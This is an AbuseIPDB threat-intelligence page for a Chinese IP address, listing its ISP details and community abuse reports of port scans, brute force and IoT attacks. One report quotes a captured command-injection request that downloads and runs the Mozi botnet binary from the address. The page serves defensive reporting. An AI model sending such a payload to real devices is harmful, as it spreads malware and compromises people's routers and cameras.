JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 59.54.88.94

59.54.88.94 was found in our database!

This IP was reported 229 times. Confidence of Abuse is 7%: ?

ISP	CHINANET Jiangxi province network
Usage Type	Fixed Line ISP
ASN	AS4134
Domain Name	online.jx.cn
Country	🇨🇳 China
City	Nanchang, Jiangxi

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 59.54.88.94

Whois 59.54.88.94

IP Abuse Reports for 59.54.88.94:

This IP address has been reported a total of 229 times from 67 distinct sources. 59.54.88.94 was first reported on August 19th 2024, and the most recent report was 1 month ago.

Old Reports: The most recent abuse report for this IP address is from 1 month ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 MPL	2026-04-24 19:12:31 (1 month ago)	tcp/49152 (2 or more attempts)	Port Scan
🇧🇷 ICS Labs	2026-04-17 12:04:06 (1 month ago)	ICS Labs Firewall blocked outbound connection from host to known malware IP 59.54.88.94:8080 (China) ... show more ICS Labs Firewall blocked outbound connection from host to known malware IP 59.54.88.94:8080 (China). show less	Hacking Exploited Host
🇺🇸 rellim.com	2026-04-10 02:41:56 (2 months ago)	Apr 9 19:41:53 alice kernel: HACK IN=enp3s0 OUT=enp1s0 MAC=68:05:ca:2e:ce:bc:00:24:dc:78:a0:01:08:0 ... show more Apr 9 19:41:53 alice kernel: HACK IN=enp3s0 OUT=enp1s0 MAC=68:05:ca:2e:ce:bc:00:24:dc:78:a0:01:08:00 SRC=59.54.88.94 DST=204.17.205.254 LEN=60 TOS=0x00 PREC=0x00 TTL=49 ID=47542 DF PROTO=TCP SPT=50586 DPT=80 WINDOW=64240 RES=0x00 SYN URGP=0 Apr 9 19:41:54 alice kernel: HACK IN=enp3s0 OUT=enp1s0 MAC=68:05:ca:2e:ce:bc:00:24:dc:78:a0:01:08:00 SRC=59.54.88.94 DST=204.17.205.254 LEN=60 TOS=0x00 PREC=0x00 TTL=49 ID=47543 DF PROTO=TCP SPT=50586 DPT=80 WINDOW=64240 RES=0x00 SYN URGP=0 Apr 9 19:41:56 alice kernel: HACK IN=enp3s0 OUT=enp1s0 MAC=68:05:ca:2e:ce:bc:00:24:dc:78:a0:01:08:00 SRC=59.54.88.94 DST=204.17.205.254 LEN=60 TOS=0x00 PREC=0x00 TTL=49 ID=47544 DF PROTO=TCP SPT=50586 DPT=80 WINDOW=64240 RES=0x00 SYN URGP=0 ... show less	Port Scan
Anonymous	2026-03-27 03:01:03 (2 months ago)	Brute force. Port: 80	Brute-Force
🇺🇸 Mark--	2026-03-20 13:12:58 (2 months ago)	Unauthorized connection attempt detected port 8080	Hacking
🇺🇸 drewf.ink	2026-03-20 02:30:16 (2 months ago)	[02:30] Port scanning. Port(s) scanned: TCP/8080	Port Scan
Anonymous	2026-03-14 21:30:05 (3 months ago)	Triggered: repeated knocking on closed ports.	Port Scan
🇺🇸 MPL	2026-02-28 18:24:39 (3 months ago)	tcp/80 (6 or more attempts)	Port Scan
🇺🇸 xmission.com	2026-02-24 18:38:16 (3 months ago)	Blocked by UFW (TCP on 81) Source port: 49952 TTL: 50 Packet length: 60 TOS: 0x08 This report (for ... show more Blocked by UFW (TCP on 81) Source port: 49952 TTL: 50 Packet length: 60 TOS: 0x08 This report (for 59.54.88.94) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇺🇸 RogueAutomata	2026-02-20 14:54:36 (3 months ago)	Detected malicious request: GET /shell?cd+/tmp;rm+-rf+;wget+http://59.54.88.94:42713/Mozi.a;chmod+7 ... show more Detected malicious request: GET /shell?cd+/tmp;rm+-rf+;wget+http://59.54.88.94:42713/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws Detections triggered: Command injection MVPower Jaws webserver command injection User-agent associated with Mirai GET with unexpected args Access via IP addr (v4) show less	IoT Targeted
🇮🇪 RoboSOC	2026-02-19 15:33:10 (3 months ago)	D-Link DSL Soap Authorization Remote Command Execution Vulnerability, PTR: PTR record not found	Hacking
🇨🇦 polycoda	2026-02-14 05:56:29 (4 months ago)	AutoBlock: 📡 Port Scan (Non Decay-Based)	Port Scan
🇺🇸 RAP	2026-02-10 15:38:33 (4 months ago)	2026-02-10 15:38:33 UTC Unauthorized activity to TCP port 8080. Web App	Port Scan Web App Attack
🇳🇱 EGP Abuse Dept	2026-02-08 15:18:33 (4 months ago)	Unauthorized connection to proxy port 8080	Port Scan Hacking
🇩🇪 centurion	2026-01-31 00:26:46 (4 months ago)	Unauthorized attempt on lab [7574/tcp] Source port: 52506 TTL: 51 Packet length: 60 TOS: 0x00 https: ... show more Unauthorized attempt on lab [7574/tcp] Source port: 52506 TTL: 51 Packet length: 60 TOS: 0x00 https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan

Showing 1 to 15 of 229 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇩🇪 2a04:c300:400::1f7

🇩🇪 185.249.74.198

🇸🇪 104.23.217.141

🇹🇷 91.151.88.168

🇸🇬 43.133.61.150

🇨🇳 182.44.38.181

🇨🇱 170.82.129.8

🇺🇸 109.105.209.4

🇷🇴 94.156.152.234

🇺🇸 74.128.244.178

🇭🇰 47.76.26.151

🇸🇳 41.82.50.218

🇺🇸 40.112.183.29

🇵🇰 2400:adc7:195d:d300:9ca8:bf94:a208:113c

🇺🇸 184.154.157.176

🇨🇳 122.114.113.177

🇩🇪 18.195.191.1

🇨🇳 8.153.102.64

🇮🇩 149.129.193.163

🇬🇧 92.27.157.252